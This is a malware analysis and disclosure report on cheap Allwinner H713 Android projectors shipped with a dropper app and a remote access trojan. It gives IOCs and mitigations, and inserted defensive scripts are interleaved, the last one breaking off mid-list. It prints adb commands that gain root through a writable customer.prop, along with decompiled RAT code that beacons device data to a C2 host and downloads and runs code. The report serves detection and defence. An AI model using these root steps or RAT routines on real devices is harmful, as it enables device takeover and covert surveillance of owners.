Technical Analysis Report — Security Research
Affected Devices: Multiple Android projectors of the brands Hotack, Huyukang, Magcubic, Nonete (e.g., Model HY260Pro)
Chipset Platform: Allwinner H713 / sun50iw12p1 — potentially affects all devices on this platform
Analysis Period: April 11–12, 2026
Classification: Pre-installed Command-and-Control infrastructure with Remote Access Trojan payload
- The Problem: Numerous cheap Android projectors (brands like Magcubic, Hotack, etc., utilizing the Allwinner H713 chip), currently sold in massive quantities on Amazon, eBay, and AliExpress, are infected with malware straight from the factory (Supply Chain Attack, similar to the "BADBOX" cases).
- The Mechanism: A seemingly harmless system app ("StoreOS") acts as a disguised dropper. It completely silently downloads a Remote Access Trojan (RAT) named "SilentSDK" in the background and installs it with maximum system privileges.
- The Danger: The malware establishes a persistent C2 connection to China (api.pixelpioneerss.com), extracts sensitive device IDs, and can download and execute arbitrary additional malicious code with root privileges at any time (chmod 777). Additionally, the devices feature open root backdoors.
- Immediate Mitigation: The C2 domains (especially *.aodintech.com and api.pixelpioneerss.com) must be blocked at the network level. Affected users can only disable the malicious apps manually via ADB, as they are deeply embedded in the system.
The malware infrastructure documented in this report is pre-installed on Android projectors currently being sold in large quantities to end consumers on Amazon, eBay, and AliExpress. The affected devices span multiple brand names (Hotack, Huyukang, Magcubic, Nonete, among others) but share the same OEM platform from the company 蓝鲨 (Blue Shark, Shenzhen). Identical C2 infrastructure has been independently confirmed on other devices from the same manufacturer (see Section 13).
The pattern matches the BADBOX cases.
At the time of analysis, the C2 servers were active and delivering a payload verified as a RAT to all devices worldwide (zone: "Global").
- Device Identification
- Investigation Workflow
- Root Access — Exploit Path
- C2 Server Response — Core Evidence
- Malware Ecosystem Overview
- StoreOS — Dropper Analysis (com.htc.storeos)
- SilentSDK — RAT Analysis (com.hotack.silentsdk)
- EventUploadService — Telemetry (com.htc.eventuploadservice)
- ExpandSDK — Ad-Injection (com.htc.expandsdk)
- System Backdoors
- Network Forensics
- Device Spoofing (Build-Fingerprint Spoofing)
- External Confirmation
- Indicators of Compromise (IOCs)
- MITRE ATT&CK Mapping
- Immediate Mitigations
- Sources
Purchased Device: Nonete Mini Beamer 4K 1080P (Amazon listing)
| Property | Value |
|---|---|
| Brand Name | Hotack / Huyukang / Magcubic HY260Pro |
| Internal Model Name | NT10 |
| SoC | Allwinner sun50iw12p1 (ARM 32-bit) |
| Operating System | SpectraOS (Android 11, Kernel 5.4.99) |
| Real Build Fingerprint | Allwinner/h713_tuna_p3/h713-tuna_p3:11 |
| Spoofed Build Fingerprint | ADT-3/adt3/adt3:11/RP1A.201005.006 |
| SELinux | Permissive (no enforcement) |
| Platform Signing Key | Public AOSP Test Key |
| OEM Certificate | CN=蓝鲨, OU=www.bsh.me, C=CN |
| Firmware Channel | HY260Pro_SpectraOS_TPYB |
Note on scope: The Allwinner H713 chipset is built into numerous cheap Android projectors sold under changing brand names in the European market. The identical firmware base (h713_tuna_p3) and identical C2 operator (Shenzhen Aodin Technology) strongly suggest that all devices from this OEM contain the same infrastructure.
| Step | Action | Result |
|---|---|---|
| 1 | Wireshark capture of network traffic | HTTP traffic to store-api.aodintech.com |
| 2 | Decoding of the gzip-compressed C2 response | 7 apps, including hidden "SilentTools" |
| 3 | AES-CBC decryption of the download path | Key 6c4928fb40e31789, URL to .bpp file |
| 4 | Root exploit via /oem/customer.prop | uid=0(root) after property injection |
| 5 | Forensic dump of /data, /oem, /system | APKs, databases, configurations |
| 6 | Static analysis of StoreOS DEX | pm install -r, byte-reversal protection |
| 7 | Reverse engineering the reverseLen mechanism | Understanding of the anti-analysis protection |
| 8 | Breaking the byte-reversal protection | Decrypted, analyzable SilentSDK DEX |
| 9 | XOR decryption of SilentSDK strings | C2 domain api.pixelpioneerss.com confirmed |
| 10 | Hash verification across three sources | MD5/SHA-256 match perfectly |
Root access was achieved through a combination of three vulnerabilities:
- SELinux Permissive — Access violations are only logged, not blocked.
- World-writable /oem — The partition is mounted as FAT with fmask=0000.
- customer.prop loaded at boot — Overwrites system properties.
```shell
adb shell getenforce          # Result: Permissive
adb shell ls -la /oem/        # All files world-writable
adb shell 'echo "ro.debuggable=1" >> /oem/customer.prop'
adb shell 'echo "service.adb.root=1" >> /oem/customer.prop'
adb shell 'echo "ro.secure=0" >> /oem/customer.prop'
adb reboot && adb wait-for-device && adb root
adb shell id
# uid=0(root) gid=0(root) context=u:r:su:s0
```

Impact: Any user with physical access or an attacker on the same network (via ADB, port 5555 open, no authentication) gains full root access.
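The three conditions above can be checked from captured device output before a unit is deployed or kept on a network. The following audit script is an added example and is not part of this report or of any firmware analysed here; it takes the text of `adb shell getenforce`, `adb shell mount` and the contents of /oem/customer.prop (the three samples embedded below are constructed, modelled on the values quoted above) and reports which of the conditions hold.

```python
"""
Audit the boot-time root path described above from captured device output.

Added example, not code from the report. Given the output of `getenforce`,
`mount` and the contents of /oem/customer.prop, it reports the conditions
that together made the device rootable: SELinux not enforcing, /oem mounted
writable with a permissive fmask, and debug/root properties present in
customer.prop. All sample inputs at the bottom are constructed.
"""
import re
from typing import Dict, List

# Property values whose presence in a writable customer.prop weakens the device.
DANGEROUS_PROPS = {
    "ro.debuggable": "1",
    "ro.secure": "0",
    "service.adb.root": "1",
}

MOUNT_LINE = re.compile(r"^(\S+) on (\S+) type (\S+) \(([^)]*)\)")


def parse_mounts(mount_output: str) -> Dict[str, Dict]:
    """Parse `mount` lines '<dev> on <mountpoint> type <fs> (<opt>,<opt>=<val>,...)'."""
    mounts: Dict[str, Dict] = {}
    for line in mount_output.splitlines():
        m = MOUNT_LINE.match(line.strip())
        if not m:
            continue
        opts = {}
        for opt in m.group(4).split(","):
            key, _, value = opt.partition("=")
            opts[key] = value
        mounts[m.group(2)] = {"device": m.group(1), "fstype": m.group(3), "options": opts}
    return mounts


def parse_props(prop_text: str) -> Dict[str, str]:
    """Parse key=value lines of an Android .prop file, ignoring comments and blanks."""
    props: Dict[str, str] = {}
    for line in prop_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        props[key.strip()] = value.strip()
    return props


def audit(getenforce: str, mount_output: str, customer_prop: str) -> List[str]:
    """Return human-readable findings; an empty list means none of the checks fired."""
    findings: List[str] = []
    mode = getenforce.strip()
    if mode.lower() != "enforcing":
        findings.append(f"SELinux is {mode} (should be Enforcing)")
    oem = parse_mounts(mount_output).get("/oem")
    if oem is None:
        findings.append("/oem not mounted (cannot verify)")
    else:
        opts = oem["options"]
        if "rw" in opts:
            findings.append("/oem is mounted read-write")
        # On vfat the fmask bits are removed from 0777, so fmask=0000 means world-writable files.
        if oem["fstype"] == "vfat" and opts.get("fmask", "0022") == "0000":
            findings.append("/oem files are world-writable (fmask=0000)")
    props = parse_props(customer_prop)
    for key, bad_value in DANGEROUS_PROPS.items():
        if props.get(key) == bad_value:
            findings.append(f"customer.prop sets {key}={bad_value}")
    return findings


# Constructed samples modelled on the values quoted in the report.
SAMPLE_GETENFORCE = "Permissive\n"
SAMPLE_MOUNT = (
    "/dev/block/by-name/oem on /oem type vfat (rw,relatime,fmask=0000,dmask=0000,codepage=437)\n"
    "/dev/block/by-name/system on / type ext4 (ro,seclabel,relatime)\n"
)
SAMPLE_PROP = "# constructed sample customer.prop\nro.debuggable=1\nservice.adb.root=1\n"

if __name__ == "__main__":
    for finding in audit(SAMPLE_GETENFORCE, SAMPLE_MOUNT, SAMPLE_PROP):
        print("[!]", finding)
```

Feed the script with real output from `adb shell getenforce`, `adb shell mount` and `adb shell cat /oem/customer.prop`; a clean device yields no findings.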
```http
POST /sign/app/list HTTP/1.1
chanId: HY260Pro_SpectraOS_TPYB
timestamp: 1775904428922
sign: [REDACTED]
Content-Type: application/json;charset=UTF-8
Content-Length: 184
Host: store-api.aodintech.com
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/5.0.0-alpha.12
```

The gzip-compressed response contains a JSON list with seven apps. Six of them are regular streaming apps (YouTube, Netflix, Disney+, Prime Video, Chrome, BrowseHere). The seventh is SilentTools:
| App | Package | isShow | isForce | isSilentInstall | isSilentUninstall | launchType |
|---|---|---|---|---|---|---|
| YouTube | com.google.android.youtube.tv | true | false | false | false | 0 |
| Disney+ | com.disney.disneyplus | true | false | false | false | 0 |
| Netflix | com.netflix.mediaclient | true | false | false | false | 0 |
| Chrome | com.android.chrome | true | false | false | false | 0 |
| Prime Video | com.amazon.amazonvideo.livingroom | true | false | false | false | 0 |
| BrowseHere | com.tcl.browser | true | false | false | false | 0 |
| SilentTools | com.hotack.silentsdk | false | true | false | true | 1 |
```json
{
  "name": "SilentTools",
  "pkg": "com.hotack.silentsdk",
  "desc": "Special app",
  "icon": "http://cdn-store.aodintech.com/com.hotack.silentsdk/image/95630a5e-e05e-4dba-814a-cf2742585b39.png",
  "category": "htc",
  "zone": "Global",
  "developer": "htc",
  "isForce": true,
  "verCode": 4,
  "verName": "2509041614",
  "verDesc": "SilentSDK",
  "installType": 0,
  "appType": "apk",
  "reverseLen": 63995,
  "path": "W15UOdzUbX72/67VLbV2cMLetfnsudxCpedAqw2GjJ8pvLI56S0gTzrp4HaetoVK3PdHXvM9vw7g+F4eFGhHDNvARfeM38tkcqo7gOpulNCb1gKYE2rmjWa+6RdjhB84+g403UUicBfFf5vHDoOEgA==",
  "size": 2474873,
  "md5": "5df097591d6942bae4eff33a37c4e28f",
  "upDate": "2025-09-04",
  "isShow": false,
  "isSilentInstall": false,
  "isSilentUninstall": true,
  "isBootStartup": false,
  "launchType": 1,
  "launchParam": "com.hotack.silentsdk.MyService"
}
```

Interpretation of the flags:
- isShow: false — The app does not appear in the store interface.
- isForce: true — Presumably forces the action (installation or update).
- isSilentUninstall: true — Can uninstall itself without user interaction.
- launchType: 1 — Automatically starts the background service.
- launchParam: MyService — Reference to the persistent service.
- zone: "Global" — Targets all devices worldwide.
- reverseLen — Byte length needed to restore the SilentSDK.apk.
The path field is AES-CBC encrypted:
- Key/IV: [REDACTED] (AES-CBC, raw) -> the ChannelID of the device.
- Decrypted result: http://cdn-store.aodintech.com/com.hotack.silentsdk/package/091acbf1-68b1-40f1-b9b7-7d4d6ae86880.bpp
Note: The field isSilentInstall is false in this capture. The exact semantics of isForce: true could not be unambiguously reconstructed from the decompiled code. It cannot be ruled out that the value is dynamically set to true server-side.
The device contains four interacting system apps, all signed with the AOSP test key and running with UID 1000 (System):
```text
                 ┌──────────────┐
                 │  DEVICE BOOT │
                 └──────┬───────┘
        ┌───────────────┼───────────────┐
        ▼               ▼               ▼
 ┌─────────────┐ ┌─────────────┐ ┌──────────────┐
 │   StoreOS   │ │  SilentSDK  │ │ EventUpload  │
 │   DROPPER   │ │     RAT     │ │  HEARTBEAT   │
 └──────┬──────┘ └──────┬──────┘ └──────┬───────┘
        ▼               ▼               ▼
   store-api.       api.pixel        event-api.
  aodintech.com   pioneerss.com    aodintech.com

 + ExpandSDK (Ad-Injection)
   → pb-api.aodintech.com
```
StoreOS presents itself as a pre-installed app store, but in practice it functions as a dropper.
Package: com.htc.storeos
SHA-256: 3476536a5c722b9e34c53abda766fb4869d5ebebfc9c8a8fd47fb7ecd5f025b9
VirusTotal: BitDefender: Android.Riskware.TestKey.rB
| Permission | Impact |
|---|---|
| INSTALL_PACKAGES | Silent installation without user dialog |
| CLEAR_APP_USER_DATA | Deletion of arbitrary app data |
| MASTER_CLEAR | Triggering factory reset |
| WRITE_SECURE_SETTINGS | Modifying security settings |
| DEVICE_POWER | Device power management |
| MANAGE_EXTERNAL_STORAGE | Full access to external storage |
- BootReceiver starts CheckUpdateService.
- HTTP POST to store-api.aodintech.com/sign/app/list.
- Server delivers AppsData[] containing the fields pkg, path, isForce, isShow, isSilentInstall, isSilentUninstall, launchType, launchParam, reverseLen, md5.
- DownloadService fetches APKs as .bpp files from the CDN.
- Byte-Reversal Protection: The first reverseLen bytes are reversed before writing to disk (anti-analysis measure).
- MD5 verification of the downloaded file.
- Installation via Runtime.getRuntime().exec("pm install -r " + filePath).
- StartAppService launches the installed app according to launchParam.
Class: AbstractC2057b — Method: m4131f(String inputPath, int reverseLen, String outputPath) -> JADX
This method reverses the first reverseLen bytes of every downloaded APK. As a result, intercepted .bpp files cannot be recognized or extracted as valid APKs without knowing the specific reverseLen value.
```java
// Simplified representation of the byte-reversal algorithm
// Original code: AbstractC2057b.m4131f()
int offset = fileSize % reverseLen;
if (fileSize - offset < reverseLen) {
    reverseLen = fileSize;
    offset = 0;
}
// 1. Copy offset bytes unchanged
// 2. Read reverseLen bytes into buffer (readCount bytes read) and reverse them:
for (int head = 0, tail = readCount - 1; head < tail; ) {
    byte tmp = buffer[head];
    buffer[head] = buffer[tail];
    buffer[tail] = tmp;
    head++; tail--;
}
// 3. Copy the remaining bytes unchanged
```

Invocation in the download path (Class RunnableC1595d, case 0):

```java
if (downInfo.getReverseLen() != 0) {
    String outputPath = inputPath.replace(".apk", "des.apk");
    if (!AbstractC2057b.m4131f(inputPath, reverseLen, outputPath)) {
        // Error handling
        return;
    }
    downInfo.setFileSavePath(outputPath);
}
// Followed by MD5 verification and installation
```

By reversing this mechanism, the SilentSDK APK was successfully decoded and analyzed.
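Because reversing a byte range twice restores it, the same transform that StoreOS applies also undoes it. The script below is an added example (it is not the report's code and not StoreOS code); it re-implements the offset and small-file logic of m4131f() in Python so an intercepted .bpp can be turned back into an APK for static analysis, and it computes, from the size (2474873) and reverseLen (63995) quoted above, which byte range of the real SilentSDK download is reversed. The sample payload is constructed.

```python
"""
Apply or undo the StoreOS ".bpp" byte reversal.

Added example, not code from the report or from StoreOS. Mirrors the
decompiled logic of AbstractC2057b.m4131f(): keep offset = size % reverseLen
leading bytes, reverse the following reverseLen bytes, keep the rest. A file
shorter than reverseLen is reversed in full. The transform is an involution,
so calling it on a .bpp yields the APK. Sample data below is constructed.
"""
from typing import Tuple


def reversed_region(file_size: int, reverse_len: int) -> Tuple[int, int]:
    """(start, end) of the byte range that m4131f() reverses for a file of file_size bytes."""
    if reverse_len <= 0:
        raise ValueError("reverse_len must be positive (StoreOS skips the step when it is 0)")
    offset = file_size % reverse_len
    # Small-file branch from the decompiled code: reverse the whole file.
    if file_size - offset < reverse_len:
        return (0, file_size)
    return (offset, offset + reverse_len)


def bpp_transform(data: bytes, reverse_len: int) -> bytes:
    """Reverse the m4131f() region of `data`; applying it twice returns the input."""
    start, end = reversed_region(len(data), reverse_len)
    return data[:start] + data[start:end][::-1] + data[end:]


def looks_like_zip(data: bytes) -> bool:
    """APKs are ZIP archives and begin with the local-file-header magic PK\\x03\\x04."""
    return data[:4] == b"PK\x03\x04"


def decode_bpp_file(src: str, dst: str, reverse_len: int) -> bool:
    """Decode a downloaded .bpp into an APK on disk; True if the result carries a ZIP header."""
    with open(src, "rb") as f:
        apk = bpp_transform(f.read(), reverse_len)
    with open(dst, "wb") as f:
        f.write(apk)
    return looks_like_zip(apk)


if __name__ == "__main__":
    # Constructed stand-in for an APK: ZIP magic followed by 1024 filler bytes (1028 total).
    fake_apk = b"PK\x03\x04" + bytes(range(256)) * 4
    rl = 257  # constructed reverseLen chosen so that 1028 % 257 == 0 and the header is hit
    bpp = bpp_transform(fake_apk, rl)
    print("encoded has ZIP magic:", looks_like_zip(bpp))
    print("round trip restores input:", bpp_transform(bpp, rl) == fake_apk)
    # Values from the C2 response above: size 2474873, reverseLen 63995.
    print("reversed region of the real download:", reversed_region(2474873, 63995))
```

For the real download the reversed region is bytes 43063 to 107058, since 2474873 mod 63995 is 43063; whether the leading bytes of a .bpp still look like a ZIP therefore depends on the file size, which is why a magic-byte check alone does not identify these downloads.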
StoreOS utilizes api.ipdatacloud.com/v2/query for IP geolocation. The SpecialApps class contains fields for continent and countryCode, allowing for region-specific payload distribution.
Package: com.hotack.silentsdk
SHA-256 (decoded): e5a193c31526a2194d04a2157321d490d68f9251fab1cbbd28c2580971396fb7
MD5 (decoded): 5df097591d6942bae4eff33a37c4e28f
| Property | Value | Meaning |
|---|---|---|
| sharedUserId | android.uid.system | System privileges (UID 1000) |
| usesCleartextTraffic | true | HTTP traffic allowed |
| Launcher Icon | Not visible to the user | Hidden from the user interface |
| BootReceiver | Priority 999 | Starts before almost all other apps |
| MyService | exported, foreground | Persistent background service |
| BootStartActivity | com.htc.bootstart | Additional boot trigger |
The original DEX is packed: The header declares 2,318,316 bytes, but the compressed file only contains 65,536 bytes with an invalid Adler32 checksum. After breaking the StoreOS byte-reversal protection, the DEX becomes fully readable — the file size and declared size match, and 16,241 strings are extractable.
All security-relevant strings are obfuscated using a rotating XOR cipher within the method AbstractC0000a.m36g():
```java
public static String m36g(byte[] data, byte[] key) {
    int i3 = 0, i4 = 0;
    while (i3 < data.length) {
        if (i4 >= key.length) i4 = 0;
        data[i3] = (byte) (data[i3] ^ key[i4]);
        i3++; i4++;
    }
    return new String(data);
}
```

| Obfuscated Call | Result | Function |
|---|---|---|
| m36g({-99,127,58,-103,...}, {-4,15,83,-73,...}) | api.pixelpioneerss.com | C2 Domain |
| m36g({125,61,58,...}, {21,73,78,...}) | https:// | Primary Protocol |
| m36g({0,90,58,...}, {104,46,78,...}) | http:// | Fallback on SSL error |
| m36g({-22,78,57}, {-71,29,117,...}) | SSL | TLS Protocol |
| m36g({-83,-92,-19,...}, {-50,-52,...}) | chmod 777 | Shell Command |
| m36g({7,-68}, {116,-44,...}) | sh | Shell Binary |
| m36g({-15}, {-112,-1,...}) | a | Custom HTTP Header Name |
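The table entries can be decoded directly from the JADX output once the signed Java byte literals are handled. The script below is an added example, not code from the report or from SilentSDK: it re-implements the rotating XOR of m36g() in Python, parses `{-99,127,...}` literals as printed by JADX (masking signed bytes to 0..255), and refuses to decode when the key literal is truncated with "..." and shorter than the data, because the rotation would then silently use the wrong key bytes. The three call sites whose inputs are complete in the table (SSL, sh, a) are used as real test vectors; the key used for the domain round trip is constructed.

```python
"""
Decrypt SilentSDK-style XOR-obfuscated strings from JADX output.

Added example, not code from the report or from SilentSDK. Re-implements the
rotating XOR of AbstractC0000a.m36g() and parses the signed byte-array
literals JADX prints, so decompiled call arguments can be pasted in as-is.
"""
import re


def parse_java_bytes(literal: str) -> bytes:
    """Turn a Java byte[] literal such as "{-99, 127, 58, ...}" into bytes.

    Java bytes are signed (-128..127); Python bytes are unsigned, so mask with 0xFF.
    A trailing "..." (truncation in the report) is ignored here and checked by m36g().
    """
    values = [int(tok) for tok in re.findall(r"-?\d+", literal)]
    for v in values:
        if not -128 <= v <= 127:
            raise ValueError(f"{v} is not a valid Java byte")
    return bytes(v & 0xFF for v in values)


def xor_rotating(data: bytes, key: bytes) -> bytes:
    """Rotating XOR exactly as m36g(): the key index wraps to 0 when it reaches len(key)."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def m36g(data_literal: str, key_literal: str) -> str:
    """Decrypt one obfuscated call site, both arguments given as Java literals."""
    data = parse_java_bytes(data_literal)
    key = parse_java_bytes(key_literal)
    if "..." in key_literal and len(data) > len(key):
        # The real key may be longer than what the report shows; wrapping a truncated
        # key would produce plausible-looking garbage, so refuse instead.
        raise ValueError("key literal is truncated; need at least as many key bytes as data bytes")
    return xor_rotating(data, key).decode("utf-8", errors="replace")


def to_java_literal(data: bytes) -> str:
    """Format bytes the way JADX prints them (signed), useful for building test vectors."""
    signed = [b - 256 if b > 127 else b for b in data]
    return "{" + ",".join(str(v) for v in signed) + "}"


if __name__ == "__main__":
    # Complete call sites from the table above.
    print(m36g("{-22,78,57}", "{-71,29,117,...}"))   # SSL
    print(m36g("{7,-68}", "{116,-44,...}"))          # sh
    print(m36g("{-15}", "{-112,-1,...}"))            # a
    # Constructed key (not the malware's): XOR is symmetric, so encrypting here
    # builds the literal an analyst would see, and m36g() recovers the string.
    demo_key = b"\x5a\x10\x77\x03\x9c"
    literal = to_java_literal(xor_rotating(b"api.pixelpioneerss.com", demo_key))
    print(literal, "->", m36g(literal, to_java_literal(demo_key)))
```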
Class: RunnableC0569n (Package p004b)
Step 1 — URL Generation with Random Path:
The method m1760b() generates a unique URL for each request:
```java
// Simplified representation of RunnableC0569n.m1760b()
String protocol = useHttps ? "https://" : "http://";
// f2663d = XOR-decrypted to "api.pixelpioneerss.com"
String domain = f2663d;
// Random path: 8-12 alphanumeric characters
int length = random.nextInt(5) + 8;
char[] path = new char[length];
// At least one letter (a/A/b/B) at a random position
// Remainder: digits and letters
return protocol + domain + "/" + new String(path);
// Result e.g.: https://api.pixelpioneerss.com/aB3k9mP2s
```

Step 2 — Beacon Payload:
```java
// From RunnableC0569n.run() — JSON construction
JSONObject beacon = new JSONObject();
beacon.put("a", getDeviceFingerprint(context));   // Device ID
beacon.put("b", appKey);                           // Campaign Key
beacon.put("c", context.getPackageName());         // com.hotack.silentsdk
beacon.put("d", currentVersion);                   // Payload Version
beacon.put("f", Build.FINGERPRINT);                // Build Fingerprint
beacon.put("h", Build.VERSION.SDK_INT);            // SDK Version
beacon.put("i", isRootAvailable);                  // Root check
```

Step 3 — AES Encryption and Transmission:
```java
// AbstractC0556a.m1728d() — AES-128-CBC encryption
byte[] encrypted = AES_CBC_encrypt(json.getBytes());
// AbstractC0000a.m41j() — HTTP POST with custom TrustManager
byte[] response = m41j(url, encrypted);
// Key and IV are appended in plaintext to the message
```

Step 4 — Processing Server Response:
```java
// From RunnableC0569n.run()
JSONObject data = new JSONObject(response).getJSONObject("data");
String downloadUrl = data.getString("a");   // DEX download URL
String md5Hash = data.getString("b");       // MD5 for verification
int version = data.getInt("c");             // Version number
// → m1762a() downloads the DEX, verifies the hash, executes it
```

Class: C0565j (implements X509TrustManager)
```java
// From AbstractC0000a.m41j() — TrustManager accepts ALL certificates
TrustManager[] trustManagerArr = {new C0565j()};
SSLContext sslContext = SSLContext.getInstance("SSL");
sslContext.init(null, trustManagerArr, new SecureRandom());
((HttpsURLConnection) conn).setSSLSocketFactory(
    sslContext.getSocketFactory()
);
```

If an SSL error (SSLException) occurs, f2664e is set to false and all subsequent requests use HTTP instead of HTTPS.
All C2 requests contain the header a: 1003 — a signature of this malware family:
```java
httpURLConnection.setRequestProperty(
    m36g({-15}, {-112,...}),   // → "a"
    String.valueOf(1003)       // → "1003"
);
```

The method m1762a() in RunnableC0569n implements the complete payload download cycle:
- Download DEX file from C2.
- Verify MD5 hash.
- Save version number in SharedPreferences.
- Load and execute DEX via DexClassLoader or Runtime.exec().
- Upon errors: increment retry counter in SharedPreferences, pause after 13 failed attempts.
Package: com.htc.eventuploadservice
Target: http://event-api.aodintech.com/report
Interval: Every 5 minutes
| Field | Example Value | Privacy Impact |
|---|---|---|
| deviceId | [REDACTED] | MAC address (PII) |
| deviceSn | [REDACTED] | Serial number (unique) |
| channel | HY260Pro_hy_TPYB | Firmware channel |
| version | Projector.20250422.152235 | Firmware version |
| model | NT10 | Device model |
| language | en_US | Language setting |
Transmission occurs unencrypted via HTTP and without user consent. The MAC address and serial number allow for the precise identification and tracking of individual devices.
Package: com.htc.expandsdk
C2 Servers: pb-api.aodintech.com, euads-o.api.leiniao.com
ExpandSDK utilizes the TCL VastAd SDK for VAST video advertisements and is capable of rendering system overlay dialogs (SYSTEM_ALERT_WINDOW) at any screen position. The configuration includes position fields (AdDialogX, AdDialogY, Width, High, Gravity) and the partner identifier htk (Hotack).
ExpandSDK operates independently from SilentSDK as a separate monetization channel.
10.1 Hidden su Binary: /system/bin/qw
An su binary renamed as qw (Koushikdutta Superuser, 388 KB, statically linked, ARM 32-bit):
```text
# /system/etc/init/qw.rc
service qw /system/bin/qw --daemon
    user root
    group root
    class core
```

- Process: PID 2409, UID 0 (root)
- Socket: /dev/com.koushikdutta.superuser.daemon/server (srwxrwxrwx)
- TCP Port: 65528 (UID 0)
The platform signing certificate is the test key publicly included in the AOSP source code (Cert Index 0 in packages.xml). Any app signed with this key automatically receives system privileges on the device. The key is freely accessible to any Android developer.
| Port | UID | Description |
|---|---|---|
| 65528 | root (0) | su Daemon |
| 5555 | root (0) | ADB without authentication |
| 7889/7890 | system (1000) | Unknown service |
| 10012/10013 | system (1000) | Factory Debug? |
/vendor/bin/dbgserver — Hardware register I/O server, communicating via the world-writable device /dev/hidtvreg (crwxrwxrwx).
All C2 communication takes place over unencrypted HTTP. This enables MITM (Man-In-The-Middle) attacks: an attacker on the same network can manipulate the app list and inject arbitrary APKs, which will then be installed with system privileges.
| Server | Endpoint | Function |
|---|---|---|
| store-api.aodintech.com | POST /sign/app/list | App Distribution |
| cdn-store.aodintech.com | GET /*.bpp | APK Download |
| event-api.aodintech.com | POST /report | Telemetry |
| api.pixelpioneerss.com | POST /(random) | SilentSDK RAT C2 |
| pb-api.aodintech.com | GET /api/collections/... | Ad Configuration |
| ota.triplesai.com:8080 | POST /V1/Ota/Check | Firmware Updates |
| api.ipdatacloud.com | GET /v2/query | IP Geolocation |
| euads-o.api.leiniao.com | — | Secondary Ad Server |
| connect.rom.miui.com | — | Xiaomi Telemetry |
The device disguises itself as Google's ADT-3 (Android TV Developer Kit):
| Property | Spoofed Value | Real Value |
|---|---|---|
| ro.build.fingerprint | ADT-3/adt3/adt3:11 | — |
| ro.product.build.* | — | Allwinner/h713_tuna_p3 |
| Build Date | — | Tue Apr 22 15:20 CST 2025 |
This spoofing is presumably intended to bypass Google Play certification checks.
In January 2026, security researcher Zane St. John published an analysis of identical devices harboring the exact same malware infrastructure. The findings match in all crucial points: C2 endpoints, XOR obfuscation, AES-128-CBC protocol, Campaign ID f101, SSL bypass, and chmod 777. The device analyzed by Zane St. John appears to have already been infected by SilentSDK, which was not the case on my device out-of-the-box. The endpoints in Zane St. John's analysis also appear slightly altered, indicating the possibility of endpoint rotation. Additionally, the SilentSDK appears to be pre-installed in his case, whereas on my device it appears to be downloaded and installed once aodintech sends the trigger signal.
Source: https://zanestjohn.com/blog/reing-with-claude-code
| Source | MD5 | SHA-256 |
|---|---|---|
| C2 Server Response | 5df097591d694... | — |
| Our Decoded APK | 5df097591d694... | e5a193c31526a... |
| External Analysis | — | e5a193c31526a... |
The hashes from the C2 server distribution, our own decryption, and the external analysis are identical, confirming that all three sources contain the exact same malware and that it is widely distributed.
StoreOS-APK: BitDefender detects Android.Riskware.TestKey.rB; no other anti-virus engines trigger an alert.
```text
api.pixelpioneerss.com      # SilentSDK RAT C2
store-api.aodintech.com     # StoreOS App Distribution
cdn-store.aodintech.com     # APK Download CDN
event-api.aodintech.com     # Telemetry Exfiltration
pb-api.aodintech.com        # ExpandSDK Ad Injection
ota.triplesai.com           # OTA Updates
api.ipdatacloud.com         # IP Geolocation
euads-o.api.leiniao.com     # Secondary Ad Server

User-Agent: okhttp/5.0.0-alpha.12
HTTP-Header: a: 1003        # SilentSDK Signature
POST /sign/app/list         # StoreOS C2 Beacon
POST /report                # EventUpload Telemetry

com.hotack.silentsdk        SHA-256: e5a193c31526a2194d04a2...
com.htc.storeos             SHA-256: 3476536a5c722b9e34c53a...
com.htc.eventuploadservice
com.htc.expandsdk

/system/bin/qw                                  # su Binary
/dev/com.koushikdutta.superuser.daemon/server   # su Socket
/oem/customer.prop                              # World-writable
/vendor/bin/dbgserver                           # HW-Debug
/dev/hidtvreg                                   # World-writable
```
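The network indicators above combine into a small detector for proxy or egress logs. The script below is an added example and not part of this report: it matches the C2 hostnames (with *.aodintech.com by suffix), the `a: 1003` header, the okhttp/5.0.0-alpha.12 User-Agent on the fixed StoreOS and EventUpload endpoints, and the 8-12 character random path of the SilentSDK beacon, and flags cleartext C2. The one-JSON-object-per-line log format and every sample record are constructed for the example; adapt `indicators()` to the field names of your own proxy export.

```python
"""
Flag SilentSDK / StoreOS C2 traffic in HTTP proxy logs.

Added example, not code from the report. Turns the network IOCs listed above
into a detector over a constructed JSON-lines log (one request per line with
src, scheme, method, host, path, headers).
"""
import json
import re
from typing import Dict, List

# Hostnames from the IOC list; any *.aodintech.com host is matched by suffix as well.
C2_HOSTS = {
    "api.pixelpioneerss.com",
    "store-api.aodintech.com",
    "cdn-store.aodintech.com",
    "event-api.aodintech.com",
    "pb-api.aodintech.com",
    "ota.triplesai.com",
}
C2_SUFFIXES = (".aodintech.com",)
BEACON_UA = "okhttp/5.0.0-alpha.12"
FIXED_ENDPOINTS = {("POST", "/sign/app/list"), ("POST", "/report")}
# SilentSDK beacon path: 8-12 alphanumerics with at least one letter.
RANDOM_PATH = re.compile(r"^/(?=[0-9]*[A-Za-z])[A-Za-z0-9]{8,12}$")


def indicators(rec: Dict) -> List[str]:
    """Return the indicator names one request matches (empty list = nothing suspicious)."""
    host = rec.get("host", "").lower()
    path = rec.get("path", "")
    method = rec.get("method", "").upper()
    headers = {k.lower(): str(v) for k, v in rec.get("headers", {}).items()}
    hits: List[str] = []
    if host in C2_HOSTS or host.endswith(C2_SUFFIXES):
        hits.append("c2-host")
    if headers.get("a") == "1003":
        hits.append("silentsdk-header-a-1003")
    if headers.get("user-agent") == BEACON_UA and (method, path) in FIXED_ENDPOINTS:
        hits.append("storeos/eventupload-endpoint")
    if host == "api.pixelpioneerss.com" and method == "POST" and RANDOM_PATH.match(path):
        hits.append("silentsdk-random-path-beacon")
    # StoreOS and EventUpload talk plain HTTP; note it so the MITM exposure is visible.
    if hits and rec.get("scheme", "http") == "http":
        hits.append("cleartext-c2")
    return hits


def scan(log_lines: List[str]) -> Dict[str, List[str]]:
    """Map each source IP that touched C2 infrastructure to its de-duplicated indicators."""
    report: Dict[str, List[str]] = {}
    for line in log_lines:
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        hits = indicators(rec)
        if hits:
            seen = report.setdefault(rec["src"], [])
            seen.extend(h for h in hits if h not in seen)
    return report


# Constructed sample log: two infected projectors (10.0.0.21, 10.0.0.37) and one benign client.
SAMPLE_LOG = [
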